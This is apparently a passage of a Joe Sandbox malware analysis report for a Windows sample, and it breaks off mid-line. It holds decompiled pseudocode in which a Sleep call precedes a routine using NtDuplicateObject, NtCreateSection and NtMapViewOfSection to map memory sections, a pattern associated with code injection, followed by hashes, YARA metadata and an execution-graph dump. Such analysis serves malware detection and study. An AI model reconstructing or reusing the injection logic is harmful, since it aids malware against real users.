				void* _t28;
				intOrPtr* _t30;

				_t33 = __eflags;
				_t25 = __edi;
				asm("out 0xdc, al");
				_t24 = __eax;
				L0040119E(__edx, 0x63, __edi, __eflags);
				_t19 =  *((intOrPtr*)(_t28 + 8));
				Sleep(0x1388);
				_t13 = E004013D8(_t24, _t33, _t19,  *((intOrPtr*)(_t28 + 0xc)),  *((intOrPtr*)(_t28 + 0x10)), _t28 - 4); // executed
				_t34 = _t13;
				if(_t13 != 0) {
					E004014A8(_t34, _t19, _t13,  *((intOrPtr*)(_t28 - 4)),  *((intOrPtr*)(_t28 + 0x14))); // executed
				}
				 *_t19(0xffffffff, 0);
				_push(0x18a0);
				_t15 =  *_t30;
				return L0040119E(_t15, 0x63, _t25, _t34);
			}









                      0x0040188b
                      0x0040188b
                      0x0040188b
                      0x0040188e
                      0x0040189b
                      0x004018a0
                      0x004018a8
                      0x004018b6
                      0x004018bb
                      0x004018bd
                      0x004018c7
                      0x004018c7
                      0x004018d0
                      0x004018d9
                      0x004018de
                      0x00401907

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 004018A8
                        • Part of subcall function 004014A8: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                        • Part of subcall function 004014A8: NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                        • Part of subcall function 004014A8: NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      Memory Dump Source
                      • Source File: 00000000.00000002.388698365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: Section$CreateDuplicateObjectSleepView
                      • String ID:
                      • API String ID: 1885482327-0
                      • Opcode ID: 3ccb135d8cd8dc8608f35812b1b48db498075e36bc90ac32ca3eb8d1277e0039
                      • Instruction ID: a729e010e1eaefc24d003010d97dd2b43a4c6b95cafc309fd02eabc3c929d3cf
                      • Opcode Fuzzy Hash: 3ccb135d8cd8dc8608f35812b1b48db498075e36bc90ac32ca3eb8d1277e0039
                      • Instruction Fuzzy Hash: 7AF04F37704205EBDB00BA95DC81A6E3769DF44315F20803BB612B91F1C63D8B12A76B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040189A Relevance: 1.3, APIs: 1, Instructions: 37sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 422 40189a-4018bd call 40119e Sleep call 4013d8 428 4018cc-401907 call 40119e 422->428 429 4018bf-4018c7 call 4014a8 422->429 429->428
                      C-Code - Quality: 61%
                      			E0040189A(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t17;
				signed char _t21;
				void* _t25;
				intOrPtr* _t27;

				_t30 = __eflags;
				_t22 = __edi;
				_pop(ds);
				L0040119E(_t8, __ecx, __edi, __eflags);
				_t17 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_t11 = E004013D8(_t21, _t30, _t17,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
				_t31 = _t11;
				if(_t11 != 0) {
					E004014A8(_t31, _t17, _t11,  *((intOrPtr*)(_t25 - 4)),  *((intOrPtr*)(_t25 + 0x14))); // executed
				}
				 *_t17(0xffffffff, 0);
				_push(0x18a0);
				_t13 =  *_t27;
				return L0040119E(_t13, 0x63, _t22, _t31);
			}










                      0x0040189a
                      0x0040189a
                      0x0040189a
                      0x0040189b
                      0x004018a0
                      0x004018a8
                      0x004018b6
                      0x004018bb
                      0x004018bd
                      0x004018c7
                      0x004018c7
                      0x004018d0
                      0x004018d9
                      0x004018de
                      0x00401907

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 004018A8
                        • Part of subcall function 004014A8: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                        • Part of subcall function 004014A8: NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                        • Part of subcall function 004014A8: NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      Memory Dump Source
                      • Source File: 00000000.00000002.388698365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: Section$CreateDuplicateObjectSleepView
                      • String ID:
                      • API String ID: 1885482327-0
                      • Opcode ID: 19053c3fc689dbcb7e5f7681520f18359435fcd39de0bfa97560276b7de449ff
                      • Instruction ID: fa21e6fe5ec55b494b8a61ead8be6eb3dfa9bfc2d8f44280934193d3a60a32fd
                      • Opcode Fuzzy Hash: 19053c3fc689dbcb7e5f7681520f18359435fcd39de0bfa97560276b7de449ff
                      • Instruction Fuzzy Hash: B3F01D37604205EBDB00BA95DC819AE3769AF04315F20843BBA12B90E1C6398B12A72B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      Function 0226092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.389281355.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2260000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: .$GetProcAddress.$l
                      • API String ID: 0-2784972518
                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                      • Instruction ID: 46277bdeb2be833d4433bb61865e73492ba3e9ff6cef753ff34ece147b5d36ee
                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                      • Instruction Fuzzy Hash: 7B3169B6911609CFDB20CF99C884BAEBBF6FF08724F14414AD441A7354D7B1EA85CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004013E3 Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.388698365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 681948f4b44aad910003ea51e67e7b20d06f6bcaff8d8bd52ab243d27cab3719
                      • Instruction ID: 653d4cf6b362dfff8c83f4e52f89d4d6250ec1a3e5e41aeb24e209779b57a096
                      • Opcode Fuzzy Hash: 681948f4b44aad910003ea51e67e7b20d06f6bcaff8d8bd52ab243d27cab3719
                      • Instruction Fuzzy Hash: 9111EF7556852491C7054F7848418B93750EB81B22B244F7FD6667F9F7D53E4C0B018E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004013F6 Relevance: .1, Instructions: 67COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.388698365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3e9c0b18502b7877294d0637dd51c8d88a75d9fefc69f981c69ac4f91e035b6e
                      • Instruction ID: 2bf5da122e206d8ddea150ce4759aa9c6fef35af7899c6b3136442ef59938823
                      • Opcode Fuzzy Hash: 3e9c0b18502b7877294d0637dd51c8d88a75d9fefc69f981c69ac4f91e035b6e
                      • Instruction Fuzzy Hash: FE01C93912982481C7164FB488418B93B50EB81B227648F7FC2267F9F7C93E480B018D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004013FE Relevance: .1, Instructions: 65COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.388698365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 56e4338ff2a01af046ba09faa78791089a11defd98368a97d240bb0c019029fc
                      • Instruction ID: 175fb33aec9134541b5c724c5eedd2ecf262b4b3a324df48efc7d2c36117c159
                      • Opcode Fuzzy Hash: 56e4338ff2a01af046ba09faa78791089a11defd98368a97d240bb0c019029fc
                      • Instruction Fuzzy Hash: 6801BD7956991540C7154FB448408EA3B50EB92B327648FBFC1657F5F7CA7B480F4188
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00401407 Relevance: .1, Instructions: 63COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.388698365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 02871fd24046ce741f2c7ac25ca5dd483e841f235b0f7f0e7175559287c1a96c
                      • Instruction ID: 0fc6c2734a9ed7443d23c078d571d2afc40337617d3eeb8826db586896f955e1
                      • Opcode Fuzzy Hash: 02871fd24046ce741f2c7ac25ca5dd483e841f235b0f7f0e7175559287c1a96c
                      • Instruction Fuzzy Hash: 4501DC7956996541CB155FB848408EA3B50EB82B323584F7FC1657F9FBCA3A4C0E0188
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 02260D90 Relevance: .0, Instructions: 43COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.389281355.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2260000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                      • Instruction ID: 371a13851f7bc2430136147e6f126d967e8cbc76b975b0e557f27e01474f70d8
                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                      • Instruction Fuzzy Hash: 6B01F7736206008FDF21CFA0C808FBE33E9FB86205F0541A4E90797285E370AA818B80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040A81C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON
                      Download Yara Rule
                      APIs
                      • __getptd.LIBCMT ref: 0040A836
                        • Part of subcall function 0040A322: __getptd_noexit.LIBCMT ref: 0040A325
                        • Part of subcall function 0040A322: __amsg_exit.LIBCMT ref: 0040A332
                      • __getptd.LIBCMT ref: 0040A847
                      • __getptd.LIBCMT ref: 0040A855
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.388729323.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                      Similarity
                      • API ID: __getptd$__amsg_exit__getptd_noexit
                      • String ID: MOC$csm
                      • API String ID: 803148776-1389381023
                      • Opcode ID: 671699303d6b60e28057f17e5ec861d0093e6d5f61e45ced52332932ffd97aae
                      • Instruction ID: db0c76aa7c4e0e0626e6bed2eef3fec0a3783135ff2f5cf4364eea1cffeb3cee
                      • Opcode Fuzzy Hash: 671699303d6b60e28057f17e5ec861d0093e6d5f61e45ced52332932ffd97aae
                      • Instruction Fuzzy Hash: 6EE012325103048FD710AAA5C4457563394FB54318F6945B6A808D7393C73CEC615687
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040C183 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.388729323.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                      Similarity
                      • API ID: __fileno__flsbuf__flush__locking
                      • String ID:
                      • API String ID: 2259706978-0
                      • Opcode ID: 15180966515bcd9a64484e0174daa60dbe67719289ee5ef70f2a1fc3c6d11957
                      • Instruction ID: 7db9d4361589b3ed1bd66184b58abc72e1ff8a651a3b30b1fe564f823639e331
                      • Opcode Fuzzy Hash: 15180966515bcd9a64484e0174daa60dbe67719289ee5ef70f2a1fc3c6d11957
                      • Instruction Fuzzy Hash: D5419031E00604DBDB249FE988C059FB7B6AF80320F24877FE815A66D1D778DE419B48
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040A1C2 Relevance: 6.1, APIs: 4, Instructions: 57COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.388729323.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                      Similarity
                      • API ID: __lock$___addlocaleref__crt_waiting_on_module_handle
                      • String ID:
                      • API String ID: 1628550938-0
                      • Opcode ID: 77557e80ab456e670524621a6396b0ec4f5b533249553a52296d6b2d98cacb2a
                      • Instruction ID: 90b4e4d6a6b9f7267b9c86ff23d96e3d4ca3ffa8321baab54594e45d1f43a617
                      • Opcode Fuzzy Hash: 77557e80ab456e670524621a6396b0ec4f5b533249553a52296d6b2d98cacb2a
                      • Instruction Fuzzy Hash: DF115171540701DFD710AF7A9905B9ABBE0AF04314F10457FE499B62E1CBB89A40CB5D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040AACD Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • __getptd.LIBCMT ref: 0040AAFF
                        • Part of subcall function 0040A322: __getptd_noexit.LIBCMT ref: 0040A325
                        • Part of subcall function 0040A322: __amsg_exit.LIBCMT ref: 0040A332
                      • __getptd.LIBCMT ref: 0040AB0D
                      • __getptd.LIBCMT ref: 0040AB1B
                      • __getptd.LIBCMT ref: 0040AB26
                        • Part of subcall function 0040ABF3: __getptd.LIBCMT ref: 0040AC02
                        • Part of subcall function 0040ABF3: __getptd.LIBCMT ref: 0040AC10
                      Memory Dump Source
                      • Source File: 00000000.00000002.388729323.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                      Similarity
                      • API ID: __getptd$__amsg_exit__getptd_noexit
                      • String ID:
                      • API String ID: 803148776-0
                      • Opcode ID: 5acad694606c70bc299f6e3d03924e6ad357319d4721c8e7a9f3fb00c0938d84
                      • Instruction ID: 4ceb4badccefb88abe74292121835467509f31c118642c149aaa2b759065458d
                      • Opcode Fuzzy Hash: 5acad694606c70bc299f6e3d03924e6ad357319d4721c8e7a9f3fb00c0938d84
                      • Instruction Fuzzy Hash: 9911DAB1C00309DFDB00EFA5D845ADE7BB1FF04318F10856AF854A7292DB789A519F59
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0041034F Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                      Download Yara Rule
                      APIs
                      • __getptd.LIBCMT ref: 0041035B
                        • Part of subcall function 0040A322: __getptd_noexit.LIBCMT ref: 0040A325
                        • Part of subcall function 0040A322: __amsg_exit.LIBCMT ref: 0040A332
                      • __getptd.LIBCMT ref: 00410372
                      • __amsg_exit.LIBCMT ref: 00410380
                      • __lock.LIBCMT ref: 00410390
                      Memory Dump Source
                      • Source File: 00000000.00000002.388729323.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                      Similarity
                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                      • String ID:
                      • API String ID: 3521780317-0
                      • Opcode ID: 8517ce2bbdcf7070739133a54bfd0fcc9a7dad6a08e4c43ac31606e5fd805cca
                      • Instruction ID: 078b7b1b4c449bd8eee7397e22a660bfcf81d1e5f576ffd6547d9eee0cff7ad2
                      • Opcode Fuzzy Hash: 8517ce2bbdcf7070739133a54bfd0fcc9a7dad6a08e4c43ac31606e5fd805cca
                      • Instruction Fuzzy Hash: 17F0FF31A407189BD730FBA6940279E73A0AB04718F50466FAC94A72D2CBBC59C1DA5E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040ABF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • __getptd.LIBCMT ref: 0040AC02
                        • Part of subcall function 0040A322: __getptd_noexit.LIBCMT ref: 0040A325
                        • Part of subcall function 0040A322: __amsg_exit.LIBCMT ref: 0040A332
                      • __getptd.LIBCMT ref: 0040AC10
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.388729323.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                      Similarity
                      • API ID: __getptd$__amsg_exit__getptd_noexit
                      • String ID: csm
                      • API String ID: 803148776-1018135373
                      • Opcode ID: 54e44990dd07edcd91bd3197dc50da7e23270eee58c40dad30b91b83af6c0ef9
                      • Instruction ID: bffc41321c1a3a0fb5d007abf3a1080087ced7d40673d35ab145433e29951c07
                      • Opcode Fuzzy Hash: 54e44990dd07edcd91bd3197dc50da7e23270eee58c40dad30b91b83af6c0ef9
                      • Instruction Fuzzy Hash: B90128348043058BEF38DF65D4886AEB3B5AF10315FAA453FE481766D1CB3889A1CB0B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Execution Graph

                      Execution Coverage:3.2%
                      Dynamic/Decrypted Code Coverage:14.5%
                      Signature Coverage:0%
                      Total number of Nodes:491
                      Total number of Limit Nodes:11
                      execution_graph 8234 40e280 8235 40a2a9 __getptd_noexit 2 API calls 8234->8235 8236 40e28d 8235->8236 8284 40b340 8285 40a322 __getptd 2 API calls 8284->8285 8287 40b34d 8285->8287 8286 40b3b4 8289 40b3af 8286->8289 8292 40afdc 8286->8292 8287->8286 8288 40b391 8287->8288 8287->8289 8288->8289 8291 40a865 ___FrameUnwindToState 2 API calls 8288->8291 8291->8289 8296 40affb 8292->8296 8293 40b308 8295 40a322 __getptd 2 API calls 8293->8295 8294 40b2ef 8327 40aee8 8294->8327 8298 40b310 8295->8298 8299 40a322 __getptd 2 API calls 8296->8299 8312 40b0e0 FindHandler IsInExceptionSpec ___TypeMatch std::bad_exception::bad_exception 8296->8312 8298->8289 8300 40b05c 8299->8300 8300->8298 8301 40a322 __getptd 2 API calls 8300->8301 8302 40b06e 8301->8302 8303 40a322 __getptd 2 API calls 8302->8303 8304 40b07c ___BuildCatchObjectHelper 8303->8304 8306 40a322 __getptd 2 API calls 8304->8306 8305 40a322 RtlEncodePointer RtlAllocateHeap __getptd 8305->8312 8307 40b0c7 8306->8307 8309 40a322 __getptd 2 API calls 8307->8309 8307->8312 8310 40b0d5 8309->8310 8311 40a322 __getptd 2 API calls 8310->8311 8311->8312 8312->8293 8312->8294 8312->8305 8313 40a865 ___FrameUnwindToState 2 API calls 8312->8313 8315 40ae7a 8312->8315 8321 40aa84 8312->8321 8313->8312 8316 40ae85 ___BuildCatchObject 8315->8316 8317 40a865 ___FrameUnwindToState 2 API calls 8316->8317 8318 40aeb7 8317->8318 8319 40aacd FindHandler 2 API calls 8318->8319 8320 40aed8 8319->8320 8320->8312 8322 40aa90 8321->8322 8323 40a322 __getptd 2 API calls 8322->8323 8324 40aa95 8323->8324 8325 40a322 __getptd 2 API calls 8324->8325 8326 40aaba 8325->8326 8328 40afd7 8327->8328 8329 40aeff 8327->8329 8328->8293 8330 40a322 __getptd 2 API calls 8329->8330 8331 40af05 8330->8331 8332 40a322 __getptd 2 API calls 8331->8332 8335 40af1e 8331->8335 8333 40af13 8332->8333 8334 40a0cd _doexit RtlEncodePointer 8333->8334 8334->8335 8335->8328 8336 40ae7a FindHandler 2 API calls 8335->8336 8336->8335 7829 402b02 7830 402b0b 7829->7830 7832 402bdc 7830->7832 7833 401869 7830->7833 7834 401877 7833->7834 7835 4018a0 Sleep 7834->7835 7840 4013d8 7835->7840 7837 4018bb 7839 4018cc 7837->7839 7852 4014a8 7837->7852 7839->7832 7841 4013df 7840->7841 7842 401547 NtDuplicateObject 7841->7842 7851 4013b1 7841->7851 7843 401564 NtCreateSection 7842->7843 7842->7851 7844 4015e4 NtCreateSection 7843->7844 7845 40158a NtMapViewOfSection 7843->7845 7847 401610 7844->7847 7844->7851 7845->7844 7846 4015ad NtMapViewOfSection 7845->7846 7846->7844 7848 4015cb 7846->7848 7849 40161a NtMapViewOfSection 7847->7849 7847->7851 7848->7844 7850 401641 NtMapViewOfSection 7849->7850 7849->7851 7850->7851 7851->7837 7853 4014b7 7852->7853 7854 401547 NtDuplicateObject 7853->7854 7863 401663 7853->7863 7855 401564 NtCreateSection 7854->7855 7854->7863 7856 4015e4 NtCreateSection 7855->7856 7857 40158a NtMapViewOfSection 7855->7857 7859 401610 7856->7859 7856->7863 7857->7856 7858 4015ad NtMapViewOfSection 7857->7858 7858->7856 7860 4015cb 7858->7860 7861 40161a NtMapViewOfSection 7859->7861 7859->7863 7860->7856 7862 401641 NtMapViewOfSection 7861->7862 7861->7863 7862->7863 7863->7839 8468 40c183 8469 40c1a1 8468->8469 8473 40c195 __fileno 8468->8473 8470 40c01f __flsbuf 2 API calls 8470->8473 8471 411a36 __flush 2 API calls 8471->8473 8472 4124fe __locking 2 API calls 8472->8473 8473->8469 8473->8470 8473->8471 8473->8472 8119 40ba06 8121 40ba12 __mtinitlocknum 8119->8121 8120 40a2a9 __getptd_noexit 2 API calls 8122 40ba3e _siglookup __decode_pointer 8120->8122 8121->8120 8121->8122 8128 40ba47 _raise __mtinitlocknum 8121->8128 8123 40bae4 8122->8123 8122->8128 8129 40b922 8122->8129 8125 40eaf4 __lock RtlEncodePointer 8123->8125 8127 40baef 8123->8127 8125->8127 8126 40a0cd _doexit RtlEncodePointer 8126->8128 8127->8126 8127->8128 8132 40b7e0 8129->8132 8131 40b933 8131->8123 8133 40b7ec __mtinitlocknum 8132->8133 8134 40eaf4 __lock RtlEncodePointer 8133->8134 8137 40b7f3 __decode_pointer 8134->8137 8135 40b8ac _doexit __mtinitlocknum __initterm 8135->8131 8136 40a0cd RtlEncodePointer _doexit 8136->8137 8137->8135 8137->8136 7933 40d64b 7936 40d65c 7933->7936 7934 40d662 7935 40d5f2 RtlEncodePointer RtlAllocateHeap _write_multi_char 7935->7936 7936->7934 7936->7935 8237 40188b 8238 40188f 8237->8238 8239 4018a0 Sleep 8238->8239 8240 4013d8 7 API calls 8239->8240 8241 4018bb 8240->8241 8242 4014a8 7 API calls 8241->8242 8243 4018cc 8241->8243 8242->8243 8408 40b90c 8409 40b7e0 _doexit RtlEncodePointer 8408->8409 8410 40b91d 8409->8410 7930 40a0cd 7931 40a05b __encode_pointer RtlEncodePointer 7930->7931 7932 40a0d4 7931->7932 8182 402ace 8183 402a74 8182->8183 8183->8182 8184 401869 15 API calls 8183->8184 8185 402abf 8183->8185 8184->8185 8340 41034f 8341 41035b __mtinitlocknum 8340->8341 8342 40a322 __getptd 2 API calls 8341->8342 8343 410360 8342->8343 8344 41038e 8343->8344 8346 410372 8343->8346 8345 40eaf4 __lock RtlEncodePointer 8344->8345 8347 410377 8345->8347 8348 40a322 __getptd 2 API calls 8346->8348 8349 40b69c __amsg_exit RtlEncodePointer 8347->8349 8350 410385 __mtinitlocknum 8347->8350 8348->8347 8349->8350 7937 40fa50 7939 40fa77 7937->7939 7940 40faf1 setSBUpLow 7939->7940 7941 4134f2 7939->7941 7942 413505 7941->7942 7945 413338 7942->7945 7944 413522 7944->7940 7946 413359 7945->7946 7950 413371 __freea ___convertcp 7946->7950 7951 416eab 7946->7951 7950->7944 7952 416ed5 7951->7952 7953 41348f 7952->7953 7959 412f18 7952->7959 7953->7950 7955 416ef4 7953->7955 7956 416fbe __freea 7955->7956 7957 416f34 ___convertcp 7955->7957 7956->7950 7957->7956 7958 4111fd __calloc_crt 2 API calls 7957->7958 7958->7956 7962 412e64 7959->7962 7963 412e7d 7962->7963 7966 412c35 7963->7966 7968 412c4a 7966->7968 7969 412c5c 7968->7969 7970 413830 7968->7970 7969->7953 7971 413844 __isleadbyte_l 7970->7971 7972 4134f2 ___crtGetStringTypeA 2 API calls 7971->7972 7973 413851 7971->7973 7972->7973 7973->7968 7974 40be51 7979 411bc0 7974->7979 7976 40be64 7988 411ae6 7979->7988 7981 40be56 7981->7976 7982 411997 7981->7982 7983 4119a3 __mtinitlocknum 7982->7983 7984 40eaf4 __lock RtlEncodePointer 7983->7984 7987 4119af 7984->7987 7985 411a18 __fcloseall __mtinitlocknum 7985->7976 7987->7985 8000 416406 7987->8000 7989 411af2 __mtinitlocknum 7988->7989 7990 40eaf4 __lock RtlEncodePointer 7989->7990 7993 411b01 _flsall 7990->7993 7992 411b99 _flsall __mtinitlocknum 7992->7981 7993->7992 7994 411a9e RtlEncodePointer RtlAllocateHeap __fflush_nolock 7993->7994 7995 40beb2 7993->7995 7994->7993 7996 40bebf 7995->7996 7999 40bed5 7995->7999 7997 40eaf4 __lock RtlEncodePointer 7996->7997 7998 40bec8 7997->7998 7998->7993 7999->7993 8001 416412 __mtinitlocknum 8000->8001 8005 416426 __fcloseall __mtinitlocknum 8001->8005 8006 40be71 8001->8006 8005->7987 8007 40be83 8006->8007 8008 40be9b 8006->8008 8007->8008 8009 40eaf4 __lock RtlEncodePointer 8007->8009 8010 41638f 8008->8010 8009->8008 8011 4163bf 8010->8011 8012 4163a3 8010->8012 8011->8012 8016 411a36 8011->8016 8012->8005 8014 4163cb __fileno __freebuf 8020 417346 8014->8020 8017 411a4f __fileno 8016->8017 8019 411a71 8016->8019 8017->8019 8024 4124fe 8017->8024 8019->8014 8021 417352 __mtinitlocknum 8020->8021 8022 416660 ___lock_fhandle RtlEncodePointer 8021->8022 8023 41735a __close_nolock __close __mtinitlocknum 8021->8023 8022->8023 8023->8012 8025 41250a __mtinitlocknum 8024->8025 8029 412512 __locking __mtinitlocknum 8025->8029 8030 416660 8025->8030 8027 412582 8027->8029 8034 411dcb 8027->8034 8029->8019 8031 41666c __mtinitlocknum 8030->8031 8032 40eaf4 __lock RtlEncodePointer 8031->8032 8033 416698 ___lock_fhandle __mtinitlocknum 8031->8033 8032->8033 8033->8027 8035 411dda __lseeki64_nolock __write_nolock 8034->8035 8037 411e01 __input_l __fassign __putwch_nolock 8035->8037 8038 40a322 8035->8038 8037->8029 8043 40a2a9 8038->8043 8041 40a337 8041->8037 8042 40b69c __amsg_exit RtlEncodePointer 8042->8041 8044 40a2b3 ___set_flsgetvalue 8043->8044 8045 4111fd __calloc_crt 2 API calls 8044->8045 8048 40a2fd 8044->8048 8046 40a2d4 __decode_pointer 8045->8046 8046->8048 8049 40a1c2 8046->8049 8048->8041 8048->8042 8050 40a1ce __crt_waiting_on_module_handle __mtinitlocknum 8049->8050 8051 40eaf4 __lock RtlEncodePointer 8050->8051 8052 40a23f __mtinit 8051->8052 8053 40eaf4 __lock RtlEncodePointer 8052->8053 8054 40a260 __mtinit ___addlocaleref __mtinitlocknum 8053->8054 8054->8048 8351 40b75b 8352 40b769 __initterm_e 8351->8352 8354 40b7a6 __initterm 8352->8354 8355 40a71f 8352->8355 8358 40a6e3 8355->8358 8357 40a72c 8357->8354 8359 40a6ef __mtinitlocknum 8358->8359 8364 40b708 8359->8364 8363 40a700 __cinit __mtinitlocknum 8363->8357 8365 40eaf4 __lock RtlEncodePointer 8364->8365 8366 40a6f4 8365->8366 8367 40a5f8 8366->8367 8368 40a60c __decode_pointer 8367->8368 8376 40a69f 8368->8376 8381 4112e9 8368->8381 8370 40a05b __encode_pointer RtlEncodePointer 8372 40a694 8370->8372 8371 40a63a 8373 40a65e 8371->8373 8380 40a686 8371->8380 8385 411249 8371->8385 8374 40a05b __encode_pointer RtlEncodePointer 8372->8374 8373->8376 8377 411249 __realloc_crt RtlEncodePointer 8373->8377 8378 40a674 8373->8378 8374->8376 8376->8363 8377->8378 8378->8376 8379 40a05b __encode_pointer RtlEncodePointer 8378->8379 8379->8380 8380->8370 8382 4112f5 __mtinitlocknum 8381->8382 8383 40eaf4 __lock RtlEncodePointer 8382->8383 8384 411305 __mtinitlocknum __msize ___sbh_find_block 8382->8384 8383->8384 8384->8371 8388 411252 8385->8388 8387 411291 8387->8373 8388->8387 8389 4160f9 8388->8389 8391 416105 ___sbh_alloc_block _realloc ___sbh_resize_block __mtinitlocknum ___sbh_find_block 8389->8391 8390 41610c _realloc __mtinitlocknum 8390->8388 8391->8390 8392 40eaf4 __lock RtlEncodePointer 8391->8392 8392->8391 8393 40ab5d 8396 40a946 8393->8396 8395 40ab65 8397 40a988 8396->8397 8398 40a950 8396->8398 8397->8395 8398->8397 8399 40a322 __getptd 2 API calls 8398->8399 8400 40a97c 8399->8400 8400->8395 8055 41065e 8056 41067c 8055->8056 8057 41066c 8055->8057 8059 410549 8056->8059 8060 41055e 8059->8060 8061 413830 __isctype_l 2 API 